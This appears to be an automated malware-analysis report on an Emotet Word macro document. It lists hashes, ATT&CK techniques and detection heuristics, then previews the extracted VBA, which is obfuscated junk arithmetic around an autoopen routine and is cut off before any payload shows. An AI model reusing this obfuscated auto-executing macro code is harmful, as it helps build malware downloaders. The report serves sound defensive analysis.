Emotet Office (OLE) malware analysis — malicious · 1aa7932c2f2de279

MALICIOUS

Office (OLE)

183.9 KB Created: 2019-05-03 07:54:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 13dedf3dd94d73646192c6ee173fd508 SHA-1: 920e40bfcef7c9ab0a3a9e1a7b859a84b2380f1e SHA-256: 1aa7932c2f2de279f71594449fccfac71b56250295cc3ba7ed8522b1f8e050ea

342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the use of WMI to create a process. This is further supported by obfuscation of the 'winmgmts' keyword, a common technique for executing commands. The ClamAV detection and presence of an auto-executing macro (autoopen) strongly suggest this is a downloader for a secondary stage, consistent with the Emotet family.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-6961572-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6961572-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44337 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44337 bytes
SHA-256: `be2b8dda27f97598c54de27459106b82b363f4e6ff4d2953d6e17a0769c56a1b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "V71802" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "P7657_" Attribute VB_Base = "0{4C695DE2-84B5-49A8-91DD-8839FF13EDCF}{E62D37D0-7405-44B6-9006-096A976823EF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "J5130136" Attribute VB_Name = "z94122" Attribute VB_Name = "I7720438" Attribute VB_Base = "0{B6DEB6FC-14CE-46B5-A430-372DE23CFC7B}{3D78AE48-417A-4B3A-A648-4BC6E3CBCCAD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "O8_2015" Function D49_9_(d9_8183) Select Case K5217926 Case E63123 = q_0967 WeekdayName H987788_ + G1816728 + (s79673 / 129707936 + (Y0680749 - Hex(W0484126 - O709307 * A4681_ + Cos(S0520_1 + 347970942 - 378139087)))) Case V5595670 = X1147250 WeekdayName j46084 + i060487 + (c2251_0 / 901160921 + (r407533 - Hex(w71233 - O78589 * n_0758_0 + Cos(D931715 + 575880779 - 850964468)))) End Select Select Case I473967 Case I68736 = U95_67 WeekdayName L2329_41 + j219429 + (J66488 / 528217205 + (r6897575 - Hex(Z3284098 - Z423494 * a5358288 + Cos(j3_909_ + 16755243 - 804572183)))) Case u15_365 = o206064 WeekdayName Z720264 + O659665 + (n557446 / 752598997 + (U_46264 - Hex(A__7712 - w74232 * E04945_ + Cos(i_1443 + 993300445 - 60226670)))) End Select Set D49_9_ = CVar(d9_8183) Select Case a5241025 Case j60735 = n1220329 WeekdayName r_3182 + L54049 + (L1056_25 / 296117980 + (U6034_27 - Hex(d094_2_7 - U_011066 * p9750953 + Cos(G3218222 + 527999036 - 778265212)))) Case W3458926 = i229345 WeekdayName n7083905 + U_27_452 + (c16767 / 11661310 + (w083_636 - Hex(f95301 - c2603_3 * G438916_ + Cos(k22999_ + 874197876 - 301802601)))) End Select Select Case C29436 Case f05_49 = L1545727 WeekdayName z1251109 + s95394_7 + (w_2_450 / 494886024 + (B355710 - Hex(U262_267 - E867701 * B83513 + Cos(R178680 + 594325131 - 245884163)))) Case L0097089 = r6627313 WeekdayName w36267_ + i_4638 + (u76453 / 937199513 + (E606056 - Hex(z4841_29 - a1463128 * Z178_6 + Cos(c0706581 + 520863803 - 620060203)))) End Select End Function Sub autoopen() Select Case j397139 Case n270751 = T95964_ WeekdayName A09_4050 + B4251_2 + (a1348726 / 48058329 + (X7_58179 - Hex(V9959234 - S0369961 * W5_025 + Cos(i_447114 + 474753483 - 895213213)))) Case v281475 = w7758419 WeekdayName U07866 + H56473 + (R9_671 / 840931557 + (U9__9177 - Hex(f453644 - K8_465 * o58517 + Cos(p2445_ + 711007169 - 978337376)))) End Select Select Case I659_403 Case b92_91 = d65_5646 WeekdayName z26__75 + b329_4 + (j7_878 / 529024518 + (O31_66 - Hex(M477977 - z9686865 * I856_604 + Cos(R19048_ + 393659947 - 511889138)))) Case S5989_50 = a971990 WeekdayName w45050 + V991_9_ + (j02755 / 659052926 + (N2960296 - Hex(w6598411 - i_7373_ * a091780 + Cos(r7450308 + 260062705 - 31434294)))) End Select Call t11339 Select Case o15622 Case i48705 = A47_48 WeekdayName j70602 + l625278 + (R98800 / 697982226 + (R61082 - Hex(r64945 - s44915 * w__3798 + Cos(m08599_4 + 975800293 - 807368713)))) Case P1476165 = z97_83 WeekdayName F921674 + c45177 + (v771839 / 683067847 + (w0029548 - Hex(N68491_2 - T30497 * V744085 + Cos(U61803 + 953111394 - 381926048)))) End Select Select Case i490_3_ Case O318542 = n12837_6 WeekdayName Y646212 + j96_400 + (i__649 / 699906479 + (z23_6_ - Hex(v_9_7498 - N29041 * T7_26900 + Cos(M84767_ + 869708947 - 781327666)))) Case h20_85 = F934870 WeekdayName Y1192558 + k3063408 + (M04051 / 607691626 + (h180359 - Hex(Z85399 - L3_190 * a783520 + Cos(K81481 + 462875308 - 964948561)))) End Sele ... (truncated)

SHA-256: be2b8dda27f97598c54de27459106b82b363f4e6ff4d2953d6e17a0769c56a1b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "V71802"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "P7657_"
Attribute VB_Base = "0{4C695DE2-84B5-49A8-91DD-8839FF13EDCF}{E62D37D0-7405-44B6-9006-096A976823EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "J5130136"

Attribute VB_Name = "z94122"

Attribute VB_Name = "I7720438"
Attribute VB_Base = "0{B6DEB6FC-14CE-46B5-A430-372DE23CFC7B}{3D78AE48-417A-4B3A-A648-4BC6E3CBCCAD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "O8_2015"
Function D49_9_(d9_8183)
   Select Case K5217926
Case E63123 = q_0967
WeekdayName H987788_ + G1816728 + (s79673 / 129707936 + (Y0680749 - Hex(W0484126 - O709307 * A4681_ + Cos(S0520_1 + 347970942 - 378139087))))
Case V5595670 = X1147250
WeekdayName j46084 + i060487 + (c2251_0 / 901160921 + (r407533 - Hex(w71233 - O78589 * n_0758_0 + Cos(D931715 + 575880779 - 850964468))))
End Select
   Select Case I473967
Case I68736 = U95_67
WeekdayName L2329_41 + j219429 + (J66488 / 528217205 + (r6897575 - Hex(Z3284098 - Z423494 * a5358288 + Cos(j3_909_ + 16755243 - 804572183))))
Case u15_365 = o206064
WeekdayName Z720264 + O659665 + (n557446 / 752598997 + (U_46264 - Hex(A__7712 - w74232 * E04945_ + Cos(i_1443 + 993300445 - 60226670))))
End Select
Set D49_9_ = CVar(d9_8183)
   Select Case a5241025
Case j60735 = n1220329
WeekdayName r_3182 + L54049 + (L1056_25 / 296117980 + (U6034_27 - Hex(d094_2_7 - U_011066 * p9750953 + Cos(G3218222 + 527999036 - 778265212))))
Case W3458926 = i229345
WeekdayName n7083905 + U_27_452 + (c16767 / 11661310 + (w083_636 - Hex(f95301 - c2603_3 * G438916_ + Cos(k22999_ + 874197876 - 301802601))))
End Select
   Select Case C29436
Case f05_49 = L1545727
WeekdayName z1251109 + s95394_7 + (w_2_450 / 494886024 + (B355710 - Hex(U262_267 - E867701 * B83513 + Cos(R178680 + 594325131 - 245884163))))
Case L0097089 = r6627313
WeekdayName w36267_ + i_4638 + (u76453 / 937199513 + (E606056 - Hex(z4841_29 - a1463128 * Z178_6 + Cos(c0706581 + 520863803 - 620060203))))
End Select
End Function
Sub autoopen()
   Select Case j397139
Case n270751 = T95964_
WeekdayName A09_4050 + B4251_2 + (a1348726 / 48058329 + (X7_58179 - Hex(V9959234 - S0369961 * W5_025 + Cos(i_447114 + 474753483 - 895213213))))
Case v281475 = w7758419
WeekdayName U07866 + H56473 + (R9_671 / 840931557 + (U9__9177 - Hex(f453644 - K8_465 * o58517 + Cos(p2445_ + 711007169 - 978337376))))
End Select
   Select Case I659_403
Case b92_91 = d65_5646
WeekdayName z26__75 + b329_4 + (j7_878 / 529024518 + (O31_66 - Hex(M477977 - z9686865 * I856_604 + Cos(R19048_ + 393659947 - 511889138))))
Case S5989_50 = a971990
WeekdayName w45050 + V991_9_ + (j02755 / 659052926 + (N2960296 - Hex(w6598411 - i_7373_ * a091780 + Cos(r7450308 + 260062705 - 31434294))))
End Select
Call t11339
   Select Case o15622
Case i48705 = A47_48
WeekdayName j70602 + l625278 + (R98800 / 697982226 + (R61082 - Hex(r64945 - s44915 * w__3798 + Cos(m08599_4 + 975800293 - 807368713))))
Case P1476165 = z97_83
WeekdayName F921674 + c45177 + (v771839 / 683067847 + (w0029548 - Hex(N68491_2 - T30497 * V744085 + Cos(U61803 + 953111394 - 381926048))))
End Select
   Select Case i490_3_
Case O318542 = n12837_6
WeekdayName Y646212 + j96_400 + (i__649 / 699906479 + (z23_6_ - Hex(v_9_7498 - N29041 * T7_26900 + Cos(M84767_ + 869708947 - 781327666))))
Case h20_85 = F934870
WeekdayName Y1192558 + k3063408 + (M04051 / 607691626 + (h180359 - Hex(Z85399 - L3_190 * a783520 + Cos(K81481 + 462875308 - 964948561))))
End Sele
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.